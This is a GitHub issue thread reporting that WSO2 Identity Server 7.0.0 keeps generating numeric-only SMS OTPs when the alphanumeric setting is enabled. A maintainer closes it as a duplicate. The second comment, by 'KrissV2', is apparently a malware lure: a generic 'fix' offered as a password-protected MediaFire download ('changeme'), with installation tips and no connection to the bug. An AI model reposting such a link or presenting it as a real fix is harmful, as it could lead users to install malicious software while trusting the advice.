### ISSUE TITLE
MFA - SMS OTP | The OTP is being generated as numeric only, even when the alphanumeric option is enabled.

### ISSUE THREAD

**Issue by nidhiraju-21** [wso2/product-is#21017] opened 2024-08-31 05:18 UTC
**Describe the issue:**
There is an option "Use only numeric characters for OTP" available under the Connections -> MFA -> SMS OTP configurations in the Console application to decide whether to have an OTP with just the numeric characters or with the alphanumeric characters. It says, Please clear this checkbox to enable alphanumeric characters. Even after disabling it by clearing the checkbox, the OTP generated still remains numeric with no changes in the behavior.

**How to reproduce:**
Disable the "Use only numeric characters for OTP" option available under SMS OTP configurations.

**Expected behavior:**
The SMS OTP should have alphanumeric characters upon disabling the above mentioned option.

**Environment information** 
 - Product Version: IS 7.0.0
 - OS: Windows, Linux, Mac
 - Database: MySQL
 - Userstore:  JDBC
 
<img width="854" alt="alphanumericBug" src="https://github.com/user-attachments/assets/fcfb84ec-92e6-4add-b8c9-bbf7d4627aff">

**Comment by KrissV2** [comment] 2024-08-31 05:33
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by ThaminduR** [comment] 2024-12-18 08:35
Duplicate of https://github.com/wso2/product-is/issues/19839

**Closed by ThaminduR** 2024-12-18 08:35 UTC
Labels: Priority/High, Severity/Critical, Type/Bug, Team/Authentication & registration
